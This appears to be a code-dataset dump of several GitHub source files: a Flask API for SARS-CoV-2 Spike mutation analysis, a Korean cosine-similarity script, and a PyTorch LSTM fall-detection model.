    \"\n \n data[\"table_stability\"].append( list(df.iloc[i, :]) )\n else:\n data[\"error\"] = \"The mutations were not found in the reference 3D Spike structure\"\n else:\n data[\"error\"] = \"There are no mutations in the sequence\"\n else:\n data[\"error\"] = \"This sequence has less than 40% of similarity with Spike.\"\n \n shutil.make_archive(directory+\"data_exportation/\"+uui, 'zip', directory+\"structural_effects/\"+uui)\n data['file_export'] += uui+'.zip'\n \n os.system(\"rm -rf \"+directory+\"structural_effects/\"+uui)\n \n try:\n link=host+\"/\"+data['file_export']\n send_success_email(user_email, link, directory+\"data_exportation/\"+uui)\n except:\n data[\"error_email\"] = \"It was not possible sending the results to the provided e-mail.\"\n \n return json.dumps(data)\n\n# Page descriptive analysis\n@app.route('/get_br_state_plots', methods=['GET'])\ndef section_get_plots_brstate():\n resp={\"error\": \"\"}\n with open(directory+'data/br_state_analysis_plot.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_info\"]=dat\n \n with open(directory+'data/br_state_analysis_data.json', 'r') as fp:\n dat = json.load(fp) \n resp[\"global_geo_data\"]=dat\n \n return json.dumps(resp)\n \n@app.route('/get_plot_forecasting//', methods=['GET'])\ndef section2_get_plot_forecasting(location, protein):\n df=pd.read_csv(directory+'data/forecasting/'+location.replace(\" \",\"-\")+\"_forecasting.tsv\", sep=\"\\t\")\n df = df[ df[\"protein\"]==protein ]\n dfaux=pd.DataFrame()\n dfaux['ds']=df['date']\n dfaux['y']=df['y']\n gm_prophet = fbprophet.Prophet(changepoint_prior_scale=0.15)\n gm_prophet.fit(dfaux)\n # Make a future dataframe for 2 years\n gm_forecast = gm_prophet.make_future_dataframe(periods=30, freq='D')\n # Make predictions\n gm_forecast = gm_prophet.predict(gm_forecast)\n gm_prophet.plot(gm_forecast, xlabel = 'Date', ylabel = 'Mean Mutations')\n plt.title('Mutations - Predicting next days')\n plt.savefig(directory+'data_exportation/'+location.replace(\" \",\"-\")+\"_\"+protein+\"_forecasting.png\")\n \n resp = {\"file_export\": '/static/results/'+location.replace(\" \",\"-\")+\"_\"+protein+\"_forecasting.png\"}\n \n return json.dumps(resp)\n \n@app.route('/mutations_mean_by_period////', methods=['GET'])\ndef section2_get_mean_mutations_period(location, period, protein, type_):\n # from hive sec0: proteins, locations\n \n # select id_genome_output, nm_nation, nm_lineage, dt_collect, nm_aminoacid_modified, nm_protein from gisaid.vw_genome_protein_domain where nm_nation='Brazil' and nm_protein='Spike'\n \n prs=protein.split(\",\")\n colors=[\"#1E90FF\",\"#228B22\",\"#BC8F8F\",\"#B0E0E6\"]\n\n with open(directory+'data/mutation_indel/'+location.replace(\" \",\"-\")+\"_\"+period+'_mutation_indel.json', 'r') as fp:\n dat = json.load(fp) \n data=dat[type_] \n labels=dat['labels']\n \n c=0\n #conditions=[]\n for p in prs:\n #conditions.append(\" nm_protein='\"+p+\"' \")\n\n data[p][\"label\"]=p\n data[p][\"borderColor\"]=colors[c]\n data[p][\"tension\"]=0.1\n data[p][\"fill\"]=False\n data[p][\"backgroundColor\"]=colors[c]\n #data[p][\"data\"]=[]\n #data[p][\"deviation\"]=[]\n\n c+=1\n datasets=[]\n \n for p in prs:\n datasets.append(data[p])\n\n resp={\"labels\": labels, \"datasets\": datasets}\n return json.dumps(resp)\n\n@app.route('/lineages_count_by_mutation//', methods=['GET'])\ndef section3_lineagesCount_by_mutation(mutations, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=mutations.split(\",\")\n \n with 
open(directory+'data/lineageCount_by_mutation.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/lineageCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Mutation\\tLineage\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\"):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/countries_count_by_mutation//', methods=['GET'])\ndef section5_countriesCount_by_mutation(mutations, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=mutations.split(\",\")\n \n with open(directory+'data/countryCount_by_mutation.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/locationsCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Mutation\\tLocation\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\" and l[0] in dat.keys()):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits and l in dat.keys()):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/mutations_count_by_lineage//', methods=['GET'])\ndef section7_mutationsCount_by_lineage(lineage, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=lineage.split(\",\")\n \n with open(directory+'data/mutationCount_by_lineage.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/mutationCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Lineage\\tMutation\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\" and l[0] in dat.keys()):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits and l in dat.keys()):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n 
pass\n\n return json.dumps(resp)\n\n@app.route('/unique_mutations_count_by_lineage//', methods=['GET'])\ndef section8_unique_mutationsCount_by_lineage(lineage, hits): # chart pie\n resp={\"error\": \"Invalid input\"}\n try:\n muts=lineage.split(\",\")\n \n with open(directory+'data/uniqueMutationCount_by_lineage.json', 'r') as fp:\n dat = json.load(fp)\n \n counts={}\n for m in muts:\n counts[m] = dat[m]\n \n with open(directory+'data/mutationCount.json', 'r') as fp:\n dat = json.load(fp)\n \n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\"}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n f.write(\"Lineage\\tMutation\\tCount\\tProportion\\n\")\n for m in counts.keys():\n resp[m]={\"labels\": [], \"counts\": []}\n sorted_={}\n _list = reversed( sorted( counts[m].items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10 and l[0]!=\"None\" and l[0] in dat.keys()):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n if(sorted_[l] > hits):\n resp[m][\"labels\"].append(l)\n resp[m][\"counts\"].append(sorted_[l]/dat[l])\n \n for l in counts[m].keys():\n if(counts[m][l] > hits and l in dat.keys()):\n f.write(\"%s\\t%s\\t%i\\t%.2f\\n\" %( m, l, counts[m][l], counts[m][l]/dat[l] ) )\n f.close()\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/get_mutations_peptide//', methods=['GET'])\ndef section9_get_mutations_peptide(protein, peptide): # chart pie\n resp={\"error\": \"Invalid input\", \"mutations\": \"\"}\n \n try:\n muts=_get_mutations('test', peptide.upper(), protein)\n \n if(muts==\"\"):\n resp['error']=\"There is no mutations in the input sequence.\"\n else:\n with open(directory+'data/mutationCount.json', 'r') as fp:\n dat = json.load(fp)\n \n nodb=[]\n indb=[]\n counts={}\n for m in muts.split(';'):\n if( protein+\"_\"+m.replace(\"-\", \"del\") in dat.keys() ):\n counts[m] = dat[protein+\"_\"+m.replace(\"-\", \"del\")]\n #indb.append(m+\" - \"+str(counts[m]))\n indb.append(m)\n else:\n counts[m] = 0\n nodb.append(m)\n \n if(counts=={}):\n resp[\"error\"]=\"Mutations were not found in database\"\n else:\n uui=str(uuid.uuid4())\n resp={\"error\": \"\", \"file_export\": \"/static/results/\"+uui+\".tsv\", \"labels\": [], \"counts\": []}\n f=open(directory+\"data_exportation/\"+uui+\".tsv\",\"w\")\n sorted_={}\n _list = reversed( sorted( counts.items(), key=lambda kv: kv[1] ) )\n i=0\n for l in _list:\n if(i<10):\n sorted_[l[0]]=l[1]\n i+=1\n \n for l in sorted_.keys():\n resp[\"labels\"].append(l)\n resp[\"counts\"].append(sorted_[l])\n \n for l in counts.keys():\n f.write(\"%s\\t%i\\n\" %( l, counts[l] ) )\n f.close()\n \n resp[\"mutations_indb\"]=indb\n resp[\"mutations_nodb\"]=nodb\n except:\n pass\n\n return json.dumps(resp)\n\n@app.route('/domain_counts_by_protein', methods=['GET'])\ndef section6_domain_counts_by_protein(): # chart pie\n fake = Factory.create()\n \n resp={\"error\": \"Invalid input\"}\n try:\n with open(directory+'data/info_domains.json', 'r') as fp:\n dat = json.load(fp)\n \n df=pd.read_csv(directory+\"data/report_domains.tsv\", sep=\"\\t\")\n df = df[ df[\"y\"]>50000 ]\n labels=df['label'].unique()\n \n colors=[]\n while (len(colors) != len(labels)):\n color=str(fake.hex_color())\n if(not color in colors):\n colors.append(color)\n \n c=0\n descs={}\n bars = []\n for label, label_df in df.groupby('label'):\n xlab=[]\n for n in label_df.x:\n domain=n.split(\"-\")[1]\n xlab.append(domain)\n descs[domain] = \"
    \"+domain+\" (\"+dat[domain]['prosite']+\") - \"+dat[domain]['description']+\"
    \"\n bars.append( { \"x\": list(xlab), \"y\": list(label_df.y), \"name\": label, \"marker\": { 'color': colors[c] }, \"type\": \"bar\" } )\n c+=1\n \n resp[\"data\"]=bars\n \n resp[\"error\"]=\"\"\n \n resp[\"info_domain\"]=\"\"\n for k in descs.keys():\n resp[\"info_domain\"]+= descs[k]\n \n except:\n pass\n\n return json.dumps(resp)\n\n\nif __name__ == \"__main__\":\n app.run(host=ip)\n\n\n", "repo_name": "YasCoMa/foca_api", "sub_path": "api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 36460, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.send_from_directory", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "simplejson.dumps", "line_number": 58, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 76, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 89, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 102, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 114, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 121, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 125, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 129, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 133, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 137, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 141, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 145, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 149, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 152, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 158, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 160, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 212, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 223, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 227, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 232, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 296, "usage_type": "call"}, {"api_name": "faker.Factory.create", "line_number": 301, "usage_type": "call"}, {"api_name": "faker.Factory", "line_number": 301, "usage_type": "name"}, {"api_name": "pandas.read_csv", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 308, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 316, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 316, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 317, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 317, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 392, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 402, "usage_type": 
"call"}, {"api_name": "pandas.read_csv", "line_number": 406, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 411, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 475, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 486, "usage_type": "call"}, {"api_name": "flask.request.form.get", "line_number": 488, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 488, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 488, "usage_type": "name"}, {"api_name": "flask.request.form.get", "line_number": 489, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 489, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 489, "usage_type": "name"}, {"api_name": "Levenshtein.ratio", "line_number": 509, "usage_type": "call"}, {"api_name": "os.system", "line_number": 514, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 517, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 527, "usage_type": "call"}, {"api_name": "os.path", "line_number": 527, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 535, "usage_type": "call"}, {"api_name": "os.path", "line_number": 535, "usage_type": "attribute"}, {"api_name": "auxiliar_functions._get_domain", "line_number": 571, "usage_type": "call"}, {"api_name": "auxiliar_functions._get_muts_in_domains", "line_number": 589, "usage_type": "call"}, {"api_name": "auxiliar_functions._get_muts_in_domains", "line_number": 599, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 627, "usage_type": "call"}, {"api_name": "os.path", "line_number": 627, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 628, "usage_type": "call"}, {"api_name": "shutil.make_archive", "line_number": 651, "usage_type": "call"}, {"api_name": "os.system", "line_number": 654, "usage_type": "call"}, {"api_name": "auxiliar_functions.send_success_email", "line_number": 658, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 662, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 669, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 673, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 676, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 680, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 682, "usage_type": "call"}, {"api_name": "fbprophet.Prophet", "line_number": 685, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 692, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 692, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 693, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 693, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 697, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 709, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 733, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 742, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 749, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 751, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 777, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 786, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 793, 
"usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 795, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 821, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 830, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 837, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 839, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 865, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 874, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 881, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 883, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 909, "usage_type": "call"}, {"api_name": "auxiliar_functions._get_mutations", "line_number": 916, "usage_type": "call"}, {"api_name": "simplejson.load", "line_number": 922, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 939, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 963, "usage_type": "call"}, {"api_name": "faker.Factory.create", "line_number": 967, "usage_type": "call"}, {"api_name": "faker.Factory", "line_number": 967, "usage_type": "name"}, {"api_name": "simplejson.load", "line_number": 972, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 974, "usage_type": "call"}, {"api_name": "simplejson.dumps", "line_number": 1007, "usage_type": "call"}]} +{"seq_id": "64526407", "text": "\"\"\"\nn-gram 유사도\nex) 2-gram\n* n을 크게 잡을수록 비교 문장의 토큰과 비교할때 카운트를 놓칠 확률이 커짐\n* n을 작게 잡을수록 카운트 확률은 높아지지만 문맥파악 정확도가 떨어짐\n\"\"\"\n\nfrom konlpy.tag import Komoran\nimport numpy as np\nfrom numpy import dot\nfrom numpy.linalg import norm\n\n\n#\n# # 어절 단위 n-gram\n# def word_ngram(bow, num_gram):\n# text = tuple(bow)\n# ngrams = [text[x:x + num_gram] for x in range(0, len(text))]\n# return tuple(ngrams)\n#\n#\n# # 음절 n-gram 분석\n# def phoneme_ngram(bow, num_gram):\n# sentence = ' '.join(bow)\n# text = tuple(sentence)\n# slen = len(text)\n# ngrams = [text[x:x + num_gram] for x in range(0, slen)]\n# return ngrams\n#\n#\n# # 유사도 계산\n# def similarity(doc1, doc2):\n# cnt = 0\n# for token in doc1:\n# if token in doc2:\n# cnt = cnt + 1\n#\n# return cnt/len(doc1)\n#\n#\n# sentence1 = '6월에 뉴턴은 선생님의 제안으로 트리니티에 입학하였다'\n# sentence2 = '6월에 뉴턴은 선생님의 제안으로 대학교에 입학하였다'\n# sentence3 = '나는 맛잇는 밥을 뉴턴 선생님과 함께 먹었습니다.'\n\n\n\n# komoran = Komoran(userdic='./user_dic.txt') # 사용자 사전 추가\n# bow1 = komoran.nouns(sentence1)\n# bow2 = komoran.nouns(sentence2)\n# bow3 = komoran.nouns(sentence3)\n#\n# doc1 = word_ngram(bow1, 2)\n# doc2 = word_ngram(bow2, 2)\n# doc3 = word_ngram(bow3, 2)\n#\n# print(doc1)\n# print(doc2)\n# print(doc3)\n#\n# r1 = similarity(doc1, doc2)\n# r2 = similarity(doc3, doc1)\n# print(r1)\n# print(r2)\n\"\"\"\n코사인 유사도\n백터간 각도를 이용해 유사성 파악\n코사인 각도를 이용함.\nngram의 경우 동일한 단어가 자주 등장하면 안좋음.\n그러므로 코사인 유사도 자주 사용\n\"\"\"\n# 코사인 유사도 계산\ndef cos_sim(vec1, vec2):\n return dot(vec1, vec2) / (norm(vec1) * norm(vec2))\n\n\n# TDM 만들기\ndef make_term_doc_mat(sentence_bow, word_dics):\n freq_mat = {}\n\n for word in word_dics:\n freq_mat[word] = 0\n\n for word in word_dics:\n if word in sentence_bow:\n freq_mat[word] += 1\n\n return freq_mat\n\n\n# 단어 벡터 만들기\ndef make_vector(tdm):\n vec = []\n for key in tdm:\n vec.append(tdm[key])\n return vec\n\n\n# 문장 정의\nsentence1 = '6월에 뉴턴은 선생님의 제안으로 트리니티에 입학하였다'\nsentence2 = '6월에 뉴턴은 선생님의 제안으로 대학교에 입학하였다'\nsentence3 = '나는 맛잇는 밥을 뉴턴 선생님과 함께 먹었습니다.'\n\n# 헝태소분석기를 이용해 단어 묶음 리스트 생성\nkomoran = Komoran()\nbow1 = 
komoran.nouns(sentence1)\nbow2 = komoran.nouns(sentence2)\nbow3 = komoran.nouns(sentence3)\n\n# 단어 묶음 리스트를 하나로 합침\nbow = bow1 + bow2 + bow3\nprint(\"bow : \", bow)\n# 단어 묶음에서 중복제거해 단어 사전 구축\nword_dics = []\nfor token in bow:\n if token not in word_dics:\n word_dics.append(token)\n\n\n# 문장 별 단어 문서 행렬 계산\nfreq_list1 = make_term_doc_mat(bow1, word_dics)\nfreq_list2 = make_term_doc_mat(bow2, word_dics)\nfreq_list3 = make_term_doc_mat(bow3, word_dics)\nprint(freq_list1)\nprint(freq_list2)\nprint(freq_list3)\n\n\n# 코사인 유사도 계산\ndoc1 = np.array(make_vector(freq_list1))\ndoc2 = np.array(make_vector(freq_list2))\ndoc3 = np.array(make_vector(freq_list3))\n\nr1 = cos_sim(doc1, doc2)\nr2 = cos_sim(doc3, doc1)\nprint(r1)\nprint(r2)\n\n", "repo_name": "yhk5689/Chatbot_hospital", "sub_path": "Study/processing/Text_simular.py", "file_name": "Text_simular.py", "file_ext": "py", "file_size_in_byte": 3479, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.dot", "line_number": 73, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 73, "usage_type": "call"}, {"api_name": "konlpy.tag.Komoran", "line_number": 104, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "40710673712", "text": "import argparse\n\nimport numpy as np\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.autograd as autograd\nfrom torch import optim\nimport torch.nn.functional as F\n\nfrom data_utils import read_data \n\nclass Net(nn.Module):\n def __init__(self, batch_size, input_size, hidden_size, num_hidden_layer, output_size, bptt):\n super(Net, self).__init__()\n self.batch_size = batch_size\n self.input_size = input_size\n self.hidden_size = hidden_size\n self.num_hidden_layer = num_hidden_layer\n self.output_size = output_size\n self.bptt = bptt\n\n self.lstm = nn.LSTM(input_size, hidden_size, num_hidden_layer)\n self.linear = nn.Linear(hidden_size, output_size)\n self.softmax = nn.Softmax()\n\n\n def forward(self, input, hidden):\n input = input.view(-1, self.batch_size, self.input_size)\n output, hidden = self.lstm(input, hidden)\n output = output.view(-1, self.hidden_size)\n output = self.softmax(self.linear(output))\n\n return output, hidden\n\n\n def init_hidden(self, cuda):\n h = Variable(torch.zeros(self.num_hidden_layer, self.batch_size, self.hidden_size))\n c = Variable(torch.zeros(self.num_hidden_layer, self.batch_size, self.hidden_size))\n if torch.cuda.is_available and cuda: \n h, c = h.cuda(), c.cuda()\n return (h, c)\n\n\n def read_sequence(self, path, num_components):\n datas = read_data(path, num_components) \n sequences = []\n for x_, y_ in datas:\n xs, ys = [], []\n for i in range(x_.shape[0] // self.bptt):\n x = x_[i*self.bptt:(i+1)*self.bptt,:]\n y = y_[i*self.bptt:(i+1)*self.bptt]\n x = torch.from_numpy(x).float()\n y = torch.from_numpy(y).long()\n xs.append(x)\n ys.append(y)\n\n sequences.append((xs, ys))\n return sequences\n\n def split_train_valid(self, sequences):\n train_seq, valid_seq = [], []\n for (idx, seq) in enumerate(sequences):\n if (idx + 1) % 3 == 0:\n valid_seq.append(seq)\n else:\n train_seq.append(seq)\n return train_seq, valid_seq\n\n\ndef train(sequences, net, error, optimizer, cuda, prob, is_training = True):\n losses = 0.0\n cnt = 0\n num_samples, 
num_correct, num_predicted, num_fall = 0.0, 0.0, 0.0, 0.0\n for (idx, seqs) in enumerate(sequences):\n hidden = net.init_hidden(cuda)\n xs, ys = seqs\n loss = 0.0\n num_x = 0\n for i in range(len(xs)):\n x, y = Variable(xs[i]), Variable(ys[i]).view(-1)\n if cuda: x, y = x.cuda(), y.cuda()\n \n pred_y, hidden = net(x, hidden)\n if np.random.rand(1,1) < prob:\n hidden = net.init_hidden(cuda)\n cnt += 1\n # cross entropy\n loss += error(pred_y, y)\n num_x += len(x)\n \n # accuracy\n _, predicted = torch.max(pred_y.data, 1)\n num_samples += y.size()[0]\n num_correct += (predicted == y.data).sum()\n losses += (loss / num_x)\n if len(sequences) > 0 and is_training:\n loss.backward()\n optimizer.step()\n num_correct = num_correct.item()\n return losses / len(sequences), num_correct / num_samples\n\n\ndef trainEpochs(train_seq, num_epochs, net, error, cuda, prob, learning_rate):\n for i in range(num_epochs):\n optimizer = optim.Adam(net.parameters(), lr = learning_rate)\n \n print (\"epoch {}\".format(i + 1))\n train_loss, _ = train(train_seq, net, error, optimizer, cuda, prob)\n print (\"train set loss is {}\".format(train_loss.data[0]))\n\n\ndef validEpochs(valid_seq, net, error, cuda, prob):\n \n learning_rate = 0.001\n optimizer = optim.Adam(net.parameters(), lr = learning_rate)\n valid_loss, valid_accuracy = train(valid_seq, net, error, optimizer, cuda, prob, False)\n print (\"valid set loss is {}\".format(valid_loss.data[0]))\n print (\"valid set accuracy is {}\".format(valid_accuracy))\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--cuda', action = 'store_true', \n help = 'use cuda')\n parser.add_argument('--path', type = str, default = 'data', \n help = 'location of data')\n parser.add_argument('--label_path', type = str, default = 'data/label.txt', \n help = 'location of label')\n parser.add_argument('--num_epochs', type = int, default = 20,\n help = 'number of epochs')\n parser.add_argument('--batch_size', type = int, default = 1,\n help = 'batch size')\n parser.add_argument('--input_size', type = int, default = 10,\n help = 'input size')\n parser.add_argument('--hidden_size', type = int, default = 100,\n help = 'hidden size')\n parser.add_argument('--num_hidden_layer', type = int, default = 2,\n help = 'num hidden layer')\n parser.add_argument('--output_size', type = int, default = 2,\n help = 'output size')\n parser.add_argument('--bptt', type = int, default = 1,\n help = 'bptt size')\n parser.add_argument('--prob', type = float, default = 0.15,\n help = 'reset probability')\n parser.add_argument('--num_components', type = int, default = 10)\n parser.add_argument('--lr', type = float, default = 0.001)\n parser.add_argument('--is_training', action = 'store_true',\n help = 'is training')\n parser.add_argument('--model_name', type = str , default = 'model/net')\n args = parser.parse_args()\n args.cuda = False\n args.model_name = 'model/net' + str(args.prob)\n # define network\n net = Net(args.batch_size, args.input_size, args.hidden_size, args.num_hidden_layer, args.output_size, args.bptt)\n if torch.cuda.is_available and args.cuda: net = net.cuda()\n\n # cross entropy error\n error = nn.CrossEntropyLoss()\n \n # read data\n folders = ['1', '2', '3', '4', '5', '6']\n sequences = net.read_sequence(args.path, args.num_components)\n train_seq, valid_seq = net.split_train_valid(sequences)\n if args.is_training:\n print (\"Train\")\n trainEpochs(train_seq, args.num_epochs, net, error, args.cuda, args.prob, args.lr)\n torch.save(net, 
args.model_name)\n else:\n print (\"Valid\")\n net = torch.load(args.model_name)\n #validEpochs(valid_seq, net, error, args.cuda, args.prob)\n validEpochs(sequences, net, error, args.cuda, args.prob)\n \n\n\n", "repo_name": "YiqiJ/Fall-Detection", "sub_path": "model.py", "file_name": "model.py", "file_ext": "py", "file_size_in_byte": 6732, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn.Module", "line_number": 13, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 13, "usage_type": "name"}, {"api_name": "torch.nn.LSTM", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 23, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 24, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.nn.Softmax", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 38, "usage_type": 